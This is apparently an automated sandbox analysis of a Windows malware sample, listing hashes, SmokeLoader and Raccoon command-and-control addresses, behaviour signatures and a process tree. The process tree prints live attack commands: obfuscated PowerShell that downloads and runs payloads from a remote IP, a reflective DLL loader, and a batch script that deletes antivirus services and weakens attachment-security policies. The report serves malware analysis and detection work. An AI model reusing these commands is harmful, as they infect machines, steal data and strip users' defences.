Analysis
-
max time kernel
150s -
max time network
158s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
13-08-2021 06:45
Static task
static1
Behavioral task
behavioral1
Sample
3da56853cea772e7f90f92c66d8c0a31.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
3da56853cea772e7f90f92c66d8c0a31.exe
Resource
win10v20210408
General
-
Target
3da56853cea772e7f90f92c66d8c0a31.exe
-
Size
320KB
-
MD5
3da56853cea772e7f90f92c66d8c0a31
-
SHA1
45a659f9006fb9703a1fef5fc9044a84788228ef
-
SHA256
776124547155ae68a2dac2b106f6aa8d39b2e71a3b11ca6241a7e305fa03605a
-
SHA512
0003c3fb6dab98f79f0fda8bd33140e9c35fc37ea4407dfdc930170f227d9209adbbbfeb96b9a41fc3ed5cfe44d716a74ff21222ec18e598db9de92a6d5ad9c8
Malware Config
Extracted
http://193.56.146.55/Api/GetFile2
Extracted
smokeloader
2020
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Extracted
raccoon
471c70de3b4f9e4d493e418d1f60a90659057de0
-
url4cnc
https://telete.in/p1rosto100xx
Extracted
raccoon
cd8dc1031358b1aec55cc6bc447df1018b068607
-
url4cnc
https://telete.in/jagressor_kz
Signatures
-
Raccoon Stealer Payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/208-181-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon behavioral2/memory/208-182-0x000000000044003F-mapping.dmp family_raccoon behavioral2/memory/208-184-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon behavioral2/memory/1640-220-0x00000000048A0000-0x0000000004931000-memory.dmp family_raccoon behavioral2/memory/1640-223-0x0000000000400000-0x0000000002CA9000-memory.dmp family_raccoon -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 3628 created 1640 3628 WerFault.exe 936B.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 204 680 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 7 IoCs
Processes:
2EF0.exe3153.exe3403.exe3B96.exeRuntimebroker.exe3403.exe936B.exepid process 208 2EF0.exe 2972 3153.exe 3476 3403.exe 2100 3B96.exe 1396 Runtimebroker.exe 208 3403.exe 1640 936B.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
3B96.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3B96.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3B96.exe -
Deletes itself 1 IoCs
Processes:
pid process 3016 -
Drops startup file 3 IoCs
Processes:
cmd.exeRuntimebroker.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk Runtimebroker.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchostsw.exe cmd.exe -
Loads dropped DLL 1 IoCs
Processes:
3403.exepid process 208 3403.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\3B96.exe themida C:\Users\Admin\AppData\Local\Temp\3B96.exe themida behavioral2/memory/2100-142-0x0000000000210000-0x0000000000211000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://193.56.146.55/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')" powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
3B96.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3B96.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
3B96.exepid process 2100 3B96.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
3da56853cea772e7f90f92c66d8c0a31.exe3403.exedescription pid process target process PID 3128 set thread context of 1872 3128 3da56853cea772e7f90f92c66d8c0a31.exe 3da56853cea772e7f90f92c66d8c0a31.exe PID 3476 set thread context of 208 3476 3403.exe 3403.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 18 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4076 208 WerFault.exe 2EF0.exe 1312 208 WerFault.exe 2EF0.exe 772 208 WerFault.exe 2EF0.exe 1856 208 WerFault.exe 2EF0.exe 2272 208 WerFault.exe 2EF0.exe 1240 208 WerFault.exe 2EF0.exe 632 1396 WerFault.exe Runtimebroker.exe 1436 1396 WerFault.exe Runtimebroker.exe 1920 1396 WerFault.exe Runtimebroker.exe 1164 1396 WerFault.exe Runtimebroker.exe 2056 1396 WerFault.exe Runtimebroker.exe 3644 1396 WerFault.exe Runtimebroker.exe 1920 208 WerFault.exe 3403.exe 2152 1640 WerFault.exe 936B.exe 3000 1640 WerFault.exe 936B.exe 2416 1640 WerFault.exe 936B.exe 4084 1640 WerFault.exe 936B.exe 3628 1640 WerFault.exe 936B.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
3da56853cea772e7f90f92c66d8c0a31.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3da56853cea772e7f90f92c66d8c0a31.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3da56853cea772e7f90f92c66d8c0a31.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3da56853cea772e7f90f92c66d8c0a31.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
3da56853cea772e7f90f92c66d8c0a31.exepid process 1872 3da56853cea772e7f90f92c66d8c0a31.exe 1872 3da56853cea772e7f90f92c66d8c0a31.exe 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3016 -
Suspicious behavior: MapViewOfSection 19 IoCs
Processes:
3da56853cea772e7f90f92c66d8c0a31.exepid process 1872 3da56853cea772e7f90f92c66d8c0a31.exe 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 3016 -
Suspicious use of AdjustPrivilegeToken 55 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe3B96.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepowershell.exe3403.exeWerFault.exepowershell.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepowershell.exedescription pid process Token: SeRestorePrivilege 4076 WerFault.exe Token: SeBackupPrivilege 4076 WerFault.exe Token: SeDebugPrivilege 4076 WerFault.exe Token: SeDebugPrivilege 1312 WerFault.exe Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeDebugPrivilege 772 WerFault.exe Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeDebugPrivilege 1856 WerFault.exe Token: SeDebugPrivilege 2272 WerFault.exe Token: SeDebugPrivilege 1240 WerFault.exe Token: SeDebugPrivilege 2100 3B96.exe Token: SeDebugPrivilege 632 WerFault.exe Token: SeDebugPrivilege 1436 WerFault.exe Token: SeDebugPrivilege 1920 WerFault.exe Token: SeDebugPrivilege 1164 WerFault.exe Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeDebugPrivilege 2056 WerFault.exe Token: SeDebugPrivilege 3644 WerFault.exe Token: SeDebugPrivilege 1320 powershell.exe Token: SeDebugPrivilege 3476 3403.exe Token: SeDebugPrivilege 1920 WerFault.exe Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeDebugPrivilege 680 powershell.exe Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeDebugPrivilege 2152 WerFault.exe Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeDebugPrivilege 3000 WerFault.exe Token: SeDebugPrivilege 2416 WerFault.exe Token: SeDebugPrivilege 4084 WerFault.exe Token: SeDebugPrivilege 3628 WerFault.exe Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeDebugPrivilege 1924 powershell.exe Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 Token: SeShutdownPrivilege 3016 Token: SeCreatePagefilePrivilege 3016 -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid process 3016 3016 -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
pid process 3016 3016 3016 -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 3016 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
3da56853cea772e7f90f92c66d8c0a31.exe2EF0.exe3153.exeRuntimebroker.exe3403.exepowershell.exedescription pid process target process PID 3128 wrote to memory of 1872 3128 3da56853cea772e7f90f92c66d8c0a31.exe 3da56853cea772e7f90f92c66d8c0a31.exe PID 3128 wrote to memory of 1872 3128 3da56853cea772e7f90f92c66d8c0a31.exe 3da56853cea772e7f90f92c66d8c0a31.exe PID 3128 wrote to memory of 1872 3128 3da56853cea772e7f90f92c66d8c0a31.exe 3da56853cea772e7f90f92c66d8c0a31.exe PID 3128 wrote to memory of 1872 3128 3da56853cea772e7f90f92c66d8c0a31.exe 3da56853cea772e7f90f92c66d8c0a31.exe PID 3128 wrote to memory of 1872 3128 3da56853cea772e7f90f92c66d8c0a31.exe 3da56853cea772e7f90f92c66d8c0a31.exe PID 3128 wrote to memory of 1872 3128 3da56853cea772e7f90f92c66d8c0a31.exe 3da56853cea772e7f90f92c66d8c0a31.exe PID 3016 wrote to memory of 208 3016 2EF0.exe PID 3016 wrote to memory of 208 3016 2EF0.exe PID 3016 wrote to memory of 208 3016 2EF0.exe PID 3016 wrote to memory of 2972 3016 3153.exe PID 3016 wrote to memory of 2972 3016 3153.exe PID 3016 wrote to memory of 2972 3016 3153.exe PID 3016 wrote to memory of 3476 3016 3403.exe PID 3016 wrote to memory of 3476 3016 3403.exe PID 3016 wrote to memory of 3476 3016 3403.exe PID 3016 wrote to memory of 2100 3016 3B96.exe PID 3016 wrote to memory of 2100 3016 3B96.exe PID 3016 wrote to memory of 2100 3016 3B96.exe PID 208 wrote to memory of 1396 208 2EF0.exe Runtimebroker.exe PID 208 wrote to memory of 1396 208 2EF0.exe Runtimebroker.exe PID 208 wrote to memory of 1396 208 2EF0.exe Runtimebroker.exe PID 2972 wrote to memory of 668 2972 3153.exe cmd.exe PID 2972 wrote to memory of 668 2972 3153.exe cmd.exe PID 2972 wrote to memory of 668 2972 3153.exe cmd.exe PID 1396 wrote to memory of 1320 1396 Runtimebroker.exe powershell.exe PID 1396 wrote to memory of 1320 1396 Runtimebroker.exe powershell.exe PID 1396 wrote to memory of 1320 1396 Runtimebroker.exe powershell.exe PID 3476 wrote to memory of 208 3476 3403.exe 3403.exe PID 3476 wrote to memory of 208 3476 3403.exe 3403.exe PID 3476 wrote to memory of 208 3476 3403.exe 3403.exe PID 3476 wrote to memory of 208 3476 3403.exe 3403.exe PID 3476 wrote to memory of 208 3476 3403.exe 3403.exe PID 3476 wrote to memory of 208 3476 3403.exe 3403.exe PID 3476 wrote to memory of 208 3476 3403.exe 3403.exe PID 3476 wrote to memory of 208 3476 3403.exe 3403.exe PID 3476 wrote to memory of 208 3476 3403.exe 3403.exe PID 3016 wrote to memory of 1640 3016 936B.exe PID 3016 wrote to memory of 1640 3016 936B.exe PID 3016 wrote to memory of 1640 3016 936B.exe PID 3016 wrote to memory of 1924 3016 explorer.exe PID 3016 wrote to memory of 1924 3016 explorer.exe PID 3016 wrote to memory of 1924 3016 explorer.exe PID 3016 wrote to memory of 1924 3016 explorer.exe PID 1396 wrote to memory of 680 1396 Runtimebroker.exe powershell.exe PID 1396 wrote to memory of 680 1396 Runtimebroker.exe powershell.exe PID 1396 wrote to memory of 680 1396 Runtimebroker.exe powershell.exe PID 3016 wrote to memory of 196 3016 explorer.exe PID 3016 wrote to memory of 196 3016 explorer.exe PID 3016 wrote to memory of 196 3016 explorer.exe PID 3016 wrote to memory of 3464 3016 explorer.exe PID 3016 wrote to memory of 3464 3016 explorer.exe PID 3016 wrote to memory of 3464 3016 explorer.exe PID 3016 wrote to memory of 3464 3016 explorer.exe PID 3016 wrote to memory of 1320 3016 explorer.exe PID 3016 wrote to memory of 1320 3016 explorer.exe PID 3016 wrote to memory of 1320 3016 explorer.exe PID 3016 wrote to memory of 3008 3016 explorer.exe PID 3016 wrote to memory of 3008 3016 explorer.exe PID 3016 wrote to memory of 3008 3016 explorer.exe PID 3016 wrote to memory of 3008 3016 explorer.exe PID 680 wrote to memory of 1924 680 powershell.exe powershell.exe PID 680 wrote to memory of 1924 680 powershell.exe powershell.exe PID 680 wrote to memory of 1924 680 powershell.exe powershell.exe PID 3016 wrote to memory of 2432 3016 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3da56853cea772e7f90f92c66d8c0a31.exe"C:\Users\Admin\AppData\Local\Temp\3da56853cea772e7f90f92c66d8c0a31.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\3da56853cea772e7f90f92c66d8c0a31.exe"C:\Users\Admin\AppData\Local\Temp\3da56853cea772e7f90f92c66d8c0a31.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\2EF0.exeC:\Users\Admin\AppData\Local\Temp\2EF0.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 7882⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 8682⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 8362⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 9122⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 8482⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 9242⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 7323⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 7843⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 7643⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 7843⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 9763⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 10083⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://193.56.146.55/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method3⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v 